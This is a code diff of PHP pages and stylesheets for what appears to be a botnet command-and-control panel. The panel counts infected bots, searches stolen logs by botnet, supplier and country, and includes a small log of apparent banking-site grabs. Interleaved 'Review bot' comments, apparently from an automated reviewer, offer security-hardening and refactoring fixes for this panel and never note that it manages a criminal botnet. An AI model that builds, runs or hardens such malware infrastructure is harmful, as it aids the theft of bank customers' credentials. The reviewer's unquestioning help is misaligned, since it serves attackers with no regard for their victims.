print "patterns";
?>


@@ -0,0 +1,67 @@
<?php
if (!BOT) exit();
$LOGSTABLES = array();
$res = mysql_query("SHOW TABLES LIKE 'logs_%'");
while ($row = mysql_fetch_row($res)) $LOGSTABLES[] = $row[0];
if (IS_AJAX_REQUEST) include "logs.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Search</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Parser</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Patterns</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "logs.search.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "logs.parser.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "logs.patterns.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>
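Review bot: The direct-access guard `if (!BOT) exit();` on the second line does not guard anything on the PHP 5 this code targets (the `mysql_*` calls below it only exist there): an undefined constant evaluates to the string 'BOT' with a notice, `!'BOT'` is false, and the script keeps running; only PHP 8 turns this into an Error. Write it as `if (!defined('BOT')) exit();`. Every other `<?php` file added in this commit opens with the same line, so the fix applies to all of them. Separately, `$res` from `mysql_query("SHOW TABLES LIKE 'logs_%'")` is handed to `mysql_fetch_row` without a `false` check, so a failed query surfaces as a warning per call rather than a handled error. The tab/table scaffolding that follows is repeated almost verbatim in the plugins, settings, stats, status, system, tasks and tracking pages; a small helper taking the tab labels and include names would remove the duplication.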


@@ -0,0 +1,124 @@
<?php
if (!BOT) exit();
print "<!-- Search form begin -->
<div id='searchformdiv'>
<form>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td class='srchopt'>Logs IDs:</td>
<td colspan=3><input type='text' name='logs_ids'></td>
<td rowspan=7 width=250px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Geolocation</div>
<select name='geolocation[]' multiple style='height:125px;display:none;'><optgroup label='CONTINENTS'>";
reset($GEOIP_CONTINENT_NAMES);
while ($val = current($GEOIP_CONTINENT_NAMES)) {
$key = key($GEOIP_CONTINENT_NAMES);
print "<option value=X{$key}>[{$key}] {$val}</option>";
next($GEOIP_CONTINENT_NAMES);
}
print "</optgroup><optgroup label='COUNTRIES'>";
for ($i=0; $i<count($GeoIP->GEOIP_COUNTRY_CODES); $i++) print "<option value={$GeoIP->GEOIP_COUNTRY_CODES[$i]}>[{$GeoIP->GEOIP_COUNTRY_CODES[$i]}] {$GeoIP->GEOIP_COUNTRY_NAMES[$i]}</option>";
print "</optgroup></select>
</td>
<td rowspan=7 width=200px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Data types</div>
<select name='datatypes[]' multiple style='height:125px;display:none;'>";
for ($i=1; $i<count($DATA_TYPES); $i++) print "<option value={$i}>{$DATA_TYPES[$i]}</option>";
print "</select>
</td>
<td rowspan=7 width=200px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Botnets</div>
<select name='botnets[]' multiple style='height:125px;display:none;'>";
reset($BOTNETS);
while ($val = current($BOTNETS)) {
$key = key($BOTNETS);
print "<option value={$key}>[ {$key} ]</option>";
next($BOTNETS);
}
print "</select>
</td>
<td rowspan=7 width=200px class='srchbox' onclick=\"$(this).find('div').hide();$(this).find('select').fadeIn();\"><div>Suppliers</div>
<select name='suppliers[]' multiple style='height:125px;display:none;'>";
reset($SUPPLIERS);
while ($val = current($SUPPLIERS)) {
$key = key($SUPPLIERS);
print "<option value={$key}>[ {$key} ]</option>";
next($SUPPLIERS);
}
print "</select>
</td>
</tr>
<tr>
<td class='srchopt'>Bots UIDs:</td>
<td colspan=3><input type='text' name='bots_uids'></td>
</tr>\n\n";
$OPTIONS = '';
rsort($LOGSTABLES);
reset($LOGSTABLES);
while ($val = current($LOGSTABLES)) {
$dispval = $val{9}.$val{10}.'.'.$val{7}.$val{8}.'.20'.$val{5}.$val{6};
$OPTIONS .= "<option value='{$val}'>{$dispval}</option>";
next($LOGSTABLES);
}
print " <tr>
<td class='srchopt' width=70px>From date:</td>
<td><select name='from_date'>{$OPTIONS}</select></td>
<td class='srchopt' width=50px>To date:</td>
<td><select name='to_date'>{$OPTIONS}</select></td>
</tr>
<tr>
<td class='srchopt'>From time:</td>
<td><input type='text' name='from_time'></td>
<td class='srchopt'>To time:</td>
<td><input type='text' name='to_time'></td>
</tr>
<tr>
<td class='srchopt'>IP mask:</td>
<td colspan=3><input type='text' name='ip_mask[]' maxlength=3 class='srchnum'>.<input type='text' name='ip_mask[]' maxlength=3 class='srchnum'>.<input type='text' name='ip_mask[]' maxlength=3 class='srchnum'>.<input type='text' name='ip_mask[]' maxlength=3 class='srchnum'></td>
</tr>
<tr>
<td class='srchopt'>Phrase:</td>
<td colspan=3><input type='text' name='phrase'></td>
</tr>
<tr>
<td class='srchopt'>Limit:</td>
<td colspan=2>
<input type='text' name='limit' value='999' maxlength=3 class='srchnum'>
</td>
<td>
<input type='submit' value='Search &raquo;&raquo;&raquo;' class='srchbtn'>
</td>
</tr>
</table>
</form>
</div>
<!-- Search form end -->
<div id='searchresultdiv'></div>
<script>
$('#searchformdiv form').submit(function() {
var zis = $(this);
$(zis).find(':submit').attr('disabled', true);
$('#searchresultdiv').empty().html('<center><img src=\"images/loading.gif\"></center>');
$.post('?logs', $(zis).serialize(), function(data){
$(zis).find(':submit').attr('disabled', false);
$('#searchresultdiv').css({'display':'none'}).empty().html(data).fadeIn();
});
return false;
});
</script>\n\n\n";
?>
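Review bot: `$val{9}.$val{10}...` in the From/To date loop uses curly-brace string offsets, which are deprecated in PHP 7.4 and a parse error in PHP 8; use `$val[9]`, `$val[10]` and so on. The expression also bakes in a fixed table-name layout (the display string is assembled as DD.MM.20YY from positions 5–10, which suggests `logs_YYMMDD` — inferred, not stated anywhere), so a `logs_%` table with a different name yields wrong characters with no error; a `preg_match` with an explicit pattern would make that assumption checkable. The keys of `$BOTNETS` and `$SUPPLIERS` and the table names are interpolated into `<option value=...>` unquoted and unescaped; wrapping them with `htmlspecialchars()` and quoting the attribute keeps a configured key containing a space or `>` from breaking the select.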


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "correlation";
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "plugins.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Plugins</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Correlation</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>XXX</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "plugins.plugins.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "plugins.correlation.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "plugins.xxx.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "plugins";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "xxx";
?>



@@ -0,0 +1,6 @@
24.04.2012 14:11:31 212.117.172.100 pareq
24.04.2012 19:29:55 212.117.172.100 pareq
24.04.2012 19:30:07 212.117.172.100 comdirect
24.04.2012 19:31:03 212.117.172.100 dkb
24.04.2012 19:32:07 212.117.172.100 bank
24.04.2012 19:33:27 92.112.54.100 int test


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "settings.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>settings1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>settings2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>settings3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "settings.settings1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "settings.settings2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "settings.settings3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "settings1";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "settings2";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "settings3";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "stats.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>stats1</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>stats2</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>stats3</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "stats.stats1.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "stats.stats2.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "stats.stats3.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "stats1";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "stats2";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "stats3";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
exit();
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "countries";
?>


@@ -0,0 +1,62 @@
<?php
if (!BOT) exit();
if (IS_AJAX_REQUEST) include "status.act.php";
print "<!-- TABS begin -->
<table width=100% cellspacing=0 cellpadding=0>
<tr>
<td nowrap class=tab_psv id='tl_1'><a href='javascript:sel(1);'>Summary</a></td>
<td nowrap class=tab_psv id='tl_2'><a href='javascript:sel(2);'>Countries</a></td>
<td nowrap class=tab_psv id='tl_3'><a href='javascript:sel(3);'>Server</a></td>
<td class=no_tab>&nbsp;</td>
</tr>
</table>
<!-- TABS end -->
<!-- TAB 1 begin -->
<table cellspacing=0 id='el_1' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 1 tabcontent begin -->\n";
include "status.summary.php";
print " <!-- TAB 1 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 1 end -->
<!-- TAB 2 begin -->
<table cellspacing=0 id='el_2' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 2 tabcontent begin -->\n";
include "status.countries.php";
print " <!-- TAB 2 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 2 end -->
<!-- TAB 3 begin -->
<table cellspacing=0 id='el_3' class=tabcont style='display:none'>
<tr>
<td>
<!-- TAB 3 tabcontent begin -->\n";
include "status.server.php";
print " <!-- TAB 3 tabcontent end -->
</td>
</tr>
</table>
<!-- TAB 3 end -->";
?>


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "server";
?>


@@ -0,0 +1,101 @@
<?php
if (!BOT) exit();
$time = time();
$totalbots = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots`;"));
$newbots24 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_birth`>".($time-24*60*60)));
$newbots1 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_birth`>".($time-1*60*60)));
$active24 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`>".($time-24*60*60)));
$active6 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`>".($time-6*60*60)));
$active1 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`>".($time-1*60*60)));
$inactive72 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`<".($time-72*60*60)));
$inactive48 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`<".($time-48*60*60)));
$inactive24 = mysql_fetch_array(mysql_query("SELECT COUNT(*) FROM `bots` WHERE `time_last`<".($time-24*60*60)));
print "<table cellspacing=1 cellpadding=0 class=block>
<tr>
<td width=15% class='title'>Total BOTs:</td>
<td width=5% class='value'>{$totalbots[0]}</td>
<td width=15% class='title'>Active BOTs within 24h:</td>
<td width=5% class='value'>{$active24[0]}</td>
<td width=15% class='title'>Inactive BOTs more 72h:</td>
<td width=5% class='value'>{$inactive72[0]}</td>
<td width=15% class='title'>Average BOTs activity:</td>
<td width=5% class='value'>???</td>
<td width=15% class='title'>!!!:</td>
<td width=5% class='value'>???</td>
</tr>
<tr>
<td class='title'>New BOTs 24h:</td>
<td class='value'>{$newbots24[0]}</td>
<td class='title'>Active BOTs within 6h:</td>
<td class='value'>{$active6[0]}</td>
<td class='title'>Inactive BOTs more 48h:</td>
<td class='value'>{$inactive48[0]}</td>
<td class='title'>Average BOTs lifetime:</td>
<td class='value'>???</td>
<td class='title'>!!!:</td>
<td class='value'>???</td>
</tr>
<tr>
<td class='title'>New BOTs 1h:</td>
<td class='value'>{$newbots1[0]}</td>
<td class='title'>Active BOTs within 1h:</td>
<td class='value'>{$active1[0]}</td>
<td class='title'>Inactive BOTs more 24h:</td>
<td class='value'>{$inactive24[0]}</td>
<td class='title'>!!!:</td>
<td class='value'>???</td>
<td class='title'>!!!:</td>
<td class='value'>???</td>
</tr>
</table>
<table cellspacing=1 cellpadding=0 class='block'>
<tr>
<td width=11% class='title'>Win 8 x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win Seven x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win 2k8 x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win Vista x32:</td>
<td width=4% class='value'>???</td>
<td width=10% class='title'>Win 2k3 x32:</td>
<td width=4% class='value'>???</td>
<td width=9% class='title'>Win XP x32:</td>
<td width=4% class='value'>???</td>
<td width=11% class='title'>Total x32:</td>
<td width=5% class='value'>???</td>
</tr>
<tr>
<td class='title'>Win 8 x64:</td>
<td class='value'>???</td>
<td class='title'>Win Seven x64:</td>
<td class='value'>???</td>
<td class='title'>Win 2k8 x64:</td>
<td class='value'>???</td>
<td class='title'>Win Vista x64:</td>
<td class='value'>???</td>
<td class='title'>Win 2k3 x64:</td>
<td class='value'>???</td>
<td class='title'>Win XP x64:</td>
<td class='value'>???</td>
<td class='title'>Total x64:</td>
<td class='value'>???</td>
</tr>
</table>";
?>
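Review bot: Each of the nine `mysql_fetch_array(mysql_query(...))` lines dereferences the query result without checking it, so one failed query becomes a warning plus an undefined `[0]` index rendered as an empty cell instead of a visible error. The same figures can come from one round trip, e.g. `SELECT COUNT(*), SUM(time_birth > {$t24}), SUM(time_last > {$t24}), ... FROM bots` with the thresholds computed once, which also keeps every count consistent with a single snapshot of `time()` rather than nine slightly different ones. The `???` and `!!!` cells for averages and the OS breakdown render literally; if they are meant to stay unimplemented for now, a comment saying so would help the next reader.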


@@ -0,0 +1,375 @@
body {
color: #708070;
background: #151518;
font-family: Tahoma;
font-size: 11px;
padding: 5px;
margin: 0;
scrollbar-face-color: #060909;
scrollbar-track-color: #222222;
scrollbar-arrow-color: #4B7B8B;
scrollbar-shadow-color: #121212;
scrollbar-3dlight-color: #202020;
scrollbar-highlight-color: #060909;
scrollbar-darkshadow-color: #202020;
}
div {
overflow:hidden;
white-space:nowrap;
}
form {
padding: 0;
margin: 0;
}
textarea,
select,
input {
width: 100%;
color: #709090;
background: #252528;
border: 1px solid #404050;
font-family: Tahoma;
font-size: 11px;
margin: 0px;
}
/****************************************\
|** MAIN **|
\****************************************/
.wrap {
width: 1250px;
background: #171C1D;
border: 2px solid #404050;
margin: 0 0 3px 0;
font-family: Tahoma;
font-size: 11px;
}
.menu {
text-align: center;
padding: 5px 0 10px 0;
}
.menu a:link,
.menu a:active,
.menu a:visited {
color: #708090;
background: #252528;
border: 1px solid #404050;
font-weight: bold;
text-decoration: none;
padding: 2px 10px;
margin: 1px;
cursor: default;
}
.menu a:hover {
color: #E05000;
background: #090909;
border: 1px solid #E05000;
}
.block {
width: 100%;
color: #708090;
background: #151518;
border: 1px solid #404050;
margin: 0 0 2px 0;
font-family: Tahoma;
font-size: 11px;
}
/****************************************\
|** TABS **|
\****************************************/
.tab_act {
font-weight: bold;
border: 0px solid #404050;
border-width: 2px 1px 0 0;
font-family: Tahoma;
font-size: 11px;
}
.tab_psv {
font-weight: bold;
border: 0px solid #404050;
border-width: 1px 1px 2px 0;
font-family: Tahoma;
font-size: 11px;
}
.tab_act a:link,
.tab_act a:active,
.tab_act a:visited {
padding: 0 20px;
color: #709070;
background: #171C1D;
text-decoration: none;
cursor: default;
}
.tab_psv a:link,
.tab_psv a:active,
.tab_psv a:visited {
padding: 0px 20px;
color: #708090;
background: #252528;
text-decoration: none;
cursor: default;
}
.tab_psv a:hover {
background:#171C1D;
color:#E05000;
}
.no_tab {
width: 100%;
border-bottom: 2px solid #404050;
font-size: 1px;
}
.tabcont {
width: 100%;
padding: 2px 2px 0 2px;
font-weight: bold;
font-family: Tahoma;
font-size: 11px;
}
/****************************************\
|** SUMMARY **|
\****************************************/
/* Status #################### */
.title {
text-align: right;
font-weight: bold;
background: #252528;
color: #808070;
height: 18px;
padding-right: 5px;
}
.value {
text-align: left;
background: #1A2020;
color: #708070;
padding-left: 5px;
}
/****************************************\
|** BOTNETS **|
\****************************************/
.bothdr {
text-align: center;
font-weight: bold;
background: #252528;
color: #808070;
height: 18px;
}
.botstr {
text-align: center;
background: #1A2020;
color: #708070;
}
.botleft {
text-align: left;
padding: 0 2px 0 2px;
}
/****************************************\
|** SEARCH **|
\****************************************/
/* Search form #################### */
.srchopt {
text-align: right;
font-weight: bold;
background: #252528;
color: #709090;
padding: 0 3px;
height: 17px;
}
.srchbox {
text-align: center;
font-weight: bold;
background: #252528;
color: #709080;
}
.srchnum {
text-align: center;
width: 30px;
}
.srchbtn {
font-weight: bold;
}
.srchbtn[disabled] {
background: #E05000;
}
/* Result #################### */
.button {
font-weight: bold;
margin: 0 2px 2px 0;
padding: 1px 10px;
width: auto;
}
.button[disabled] {
background: #E05000;
}
.highlight {
font-weight: bold;
color: #C04000;
}
.srchlight {
font-weight: bold;
background: #FFFFFF;
}
.hdrslight {
font-weight: bold;
color: #999999;
}
.varslight {
font-weight: bold;
color: #000000;
}
.briefrow0,
.briefrow1 {
font-size: 11px;
cursor: default;
}
.briefrow0 {
background: #1A2020;
color: #808090;
}
.briefrow1 {
background: #1A1D1A;
color: #808090;
}
.logrow0,
.logrow1 {
font-size: 11px;
}
.logrow0 {
background: #2A3030;
color: #808090;
}
.logrow1 {
background: #2A2D2A;
color: #808090;
}
.loghlt {
background: #E05000;
}
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
.briefcell {
width: 604px;
cursor: pointer;
overflow:hidden;
white-space:nowrap;
}


@@ -0,0 +1,349 @@
body {
color: #709090;
background: #151518;
font-family: Tahoma;
font-size: 11px;
font-weight: bold;
padding: 5px;
margin: 0;
scrollbar-face-color: #060909;
scrollbar-track-color: #222222;
scrollbar-arrow-color: #4B7B8B;
scrollbar-shadow-color: #121212;
scrollbar-3dlight-color: #202020;
scrollbar-highlight-color: #060909;
scrollbar-darkshadow-color: #202020;
}
form {
padding: 0;
margin: 0;
}
textarea,
select,
input {
width: 100%;
height: 100%;
color: #709090;
background: #252528;
border: 1px solid #404050;
font-family: Tahoma;
font-size: 11px;
margin: 0;
}
table {
font-family: Tahoma;
font-size: 11px;
}
table tr td {
vertical-align: top;
}
div {
overflow:hidden;
white-space:nowrap;
}
/****************************************\
|** MAIN **|
\****************************************/
.menu {
text-align: center;
padding: 5px 0 10px 0;
}
.menu a:link,
.menu a:active,
.menu a:visited {
color: #709080;
background: #252528;
border: 1px solid #404050;
font-weight: bold;
text-decoration: none;
padding: 2px 10px;
margin: 1px;
cursor: default;
}
.menu a:hover {
color: #E05000;
background: #090909;
border: 1px solid #E05000;
}
.wrap {
width: 1200px;
background: #171C1D;
border: 2px solid #404050;
margin: 0 0 3px 0;
}
.block {
width: 100%;
color: #709090;
background: #151518;
border: 1px solid #404050;
margin: 0 0 2px 0;
}
/****************************************\
|** TABS **|
\****************************************/
.tab_act {
font-size: 11px;
font-weight: bold;
border: 0px solid #404050;
border-width: 2px 1px 0 0;
}
.tab_psv {
font-size: 11px;
font-weight: bold;
border: 0px solid #404050;
border-width: 1px 1px 2px 0;
}
.tab_act a:link,
.tab_act a:active,
.tab_act a:visited {
cursor: default;
padding: 0 20px;
color: #709080;
background: #171C1D;
text-decoration: none;
}
.tab_psv a:link,
.tab_psv a:active,
.tab_psv a:visited {
cursor: default;
padding: 0px 20px;
color: #709090;
background: #252528;
text-decoration: none;
}
.tab_psv a:hover {
background:#171C1D;
color:#E05000;
}
.no_tab {
width: 100%;
font-size: 0;
border-bottom: 2px solid #404050;
}
.cont {
font-family: Tahoma;
font-size: 11px;
width: 100%;
padding: 2px 2px 0 2px;
}
/****************************************\
|** SEARCH **|
\****************************************/
/* Search form #################### */
.srchopt {
text-align: right;
font-weight: bold;
background: #252528;
color: #709090;
padding: 0 3px;
height: 17px;
}
.srchbox {
text-align: center;
font-weight: bold;
background: #252528;
color: #709080;
}
.srchnum {
text-align: center;
width: 30px;
}
.srchbtn {
font-weight: bold;
padding: 1px 10px;
width: auto;
}
.srchbtn[disabled] {
background: #E05000;
}
/* Result #################### */
.button {
font-weight: bold;
margin: 0 2px 2px 0;
padding: 1px 10px;
width: auto;
}
.button[disabled] {
background: #E05000;
}
.highlight {
font-weight: bold;
color: #C04000;
}
.varslight {
font-weight: bold;
color: #000000;
}
.srchlight {
font-weight: bold;
background: #FFFFFF;
}
.brief {
cursor: pointer;
}
.briefrow0,
.briefrow1 {
font-size: 11px;
cursor: default;
}
.briefrow0 {
background: #1A2020;
color: #808090;
}
.briefrow1 {
background: #1A1D1A;
color: #808090;
}
.logrow0,
.logrow1 {
font-size: 11px;
}
.logrow0 {
background: #2A3030;
color: #808090;
}
.logrow1 {
background: #2A2D2A;
color: #808090;
}
.loghlt {
background: #E05000;
}
/****************************************\
|** BOTNETS **|
\****************************************/
.bothdr {
text-align: center;
font-weight: bold;
background: #252528;
color: #709090;
height: 18px;
}
.botstr {
text-align: center;
background: #1A2020;
color: #709090;
}
.botleft {
text-align: left;
padding: 0 2px 0 2px;
}
/****************************************\
|** STATUS **|
\****************************************/
.valname {
text-align: right;
font-weight: bold;
background: #252528;
color: #709090;
height: 18px;
padding-right: 5px;
}
.valval {
text-align: left;
background: #1A2020;
color: #709090;
padding-left: 5px;
}


@@ -0,0 +1,19 @@
<?php
if (!BOT) exit();
if (isset($_POST['killproc'])) {
foreach($_POST['kill_id'] as $id) mysql_query("KILL ".intval($id));
exit('success');
}
if (isset($_POST['dbact'])) {
exit(file_get_contents('php://input'));
}
exit();
?>
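Review bot: `foreach($_POST['kill_id'] as $id)` runs without checking that `kill_id` was posted as an array, so a request missing it (or carrying a scalar) emits a warning and still exits with 'success', which the MySQL tab's script treats as confirmation and removes the checked rows. Guard with `if (!empty($_POST['kill_id']) && is_array($_POST['kill_id']))` before the loop and return an error string otherwise; `intval($id)` is the right cast for the `KILL` argument. The `dbact` branch echoes the raw request body back instead of performing the optimize/truncate/drop action that form submits — presumably a stub, but a comment would make that explicit. Neither handler, nor `dellogs` in the logs page, checks a per-session token, so these state-changing POSTs are open to cross-site request forgery; a token embedded in the forms and verified here is the standard mitigation.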


@@ -0,0 +1,8 @@
<?php
if (!BOT) exit();
print "apache";
?>


@@ -0,0 +1,108 @@
<?php
if (!BOT) exit();
$result = mysql_query("SHOW TABLE STATUS");
print "<form id='dbact'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td></td>
<td>Name</td>
<td>Rows</td>
<td>Data Length</td>
<td>Index Length</td>
<td>Trash</td>
</tr>";
while($row = mysql_fetch_array($result)){
print " <tr class='botstr'>
<td width=14px><input type='checkbox' name='manage_name[]' value='{$row['Name']}'></td>
<td>{$row['Name']}</td>
<td>{$row['Rows']}</td>
<td>".round($row['Data_length']/1024/1024, 2)." MB / ".round($row['Max_data_length']/1024/1024/1024, 2)." GB</td>
<td>".round($row['Index_length']/1024/1024, 2)." MB</td>
<td>".round($row['Data_free']/1024/1024, 2)." MB</td>
</tr>";
}
print "</table>
<select name='action' class='button'>
<option value='optimize'>Optimize</option><option value='truncate'>Truncate</option><option value='drop'>Drop</option>
</select><input type='submit' class='button' value='Go'>
</form>
<script>
$('#dbact').submit(function() {
var frm = $(this);
var req = $(frm).serialize();
if (req == '') { alert('Select something first'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?system', 'dbact=&' + req, function(data) {
alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>";
$result = mysql_query("SHOW PROCESSLIST");
print "<form id='killproc'>
<table cellspacing=1 cellpadding=0 class='block'>
<tr class='bothdr'>
<td></td>
<td>ID</td>
<td>User</td>
<td>Host</td>
<td>DB</td>
<td>Command</td>
<td>Time</td>
<td>State</td>
<td>Info</td>
</tr>\n\n";
while($row = mysql_fetch_array($result)){
print " <tr class='botstr'>
<td width=14px><input type='checkbox' name='kill_id[]' value='$row[Id]'></td>
<td>$row[Id]</td>
<td>$row[User]</td>
<td>$row[Host]</td>
<td>$row[db]</td>
<td>$row[Command]</td>
<td>".date('H:i:s',$row['Time'])."</td>
<td>$row[State]</td>
<td>$row[Info]</td>
</tr>";
};
print "</table>
<input type='submit' class='button' value='Kill Threads'>
</form>
<script>
$('#killproc').submit(function() {
var frm = $(this);
var req = $(frm).serialize();
if (req == '') { alert('Select something first'); return false; }
$(frm).find(':submit').attr('disabled', true);
$.post('?system', 'killproc=&' + req, function(data) {
if (data == 'success') $(frm).find('input:checked').parent().parent().remove();
else alert(data);
$(frm).find(':submit').attr('disabled', false);
});
return false;
});
</script>";
?>
